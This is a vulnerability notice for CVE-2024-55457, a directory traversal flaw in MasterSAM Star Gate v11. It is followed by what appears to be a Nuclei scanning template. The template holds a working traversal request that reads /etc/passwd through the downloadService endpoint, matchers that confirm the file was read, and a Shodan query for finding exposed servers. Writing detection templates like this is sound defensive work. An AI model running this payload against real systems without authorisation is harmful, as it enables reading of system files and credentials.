MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
PoC代码[已公开]
id: CVE-2024-55457
info:
name: MasterSAM Star Gate v11 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
impact: |
Unauthenticated attackers can exploit directory traversal to read arbitrary files from the server, potentially exposing sensitive configuration data, credentials, and system files.
remediation: |
Contact MasterSAM for a patched version of Star Gate v11 that addresses the directory traversal vulnerability.
reference:
- https://github.com/h13nh04ng/CVE-2024-55457-PoC
- https://x.com/cyber_advising/status/1876034270852231257
classification:
epss-score: 0.76159
epss-percentile: 0.9888
metadata:
verified: true
max-request: 1
shodan-query: html:"MasterSAM"
tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 490a0046304402205ddd98509d26ecd23c5051321b859f6ae5bade1f435107918282a8b83490ed9902205a522fa007bd870bc5262d106bc2309d9811a373738c19c46689c3a4d52452db:922c64590222798bb761d5b6d8e72950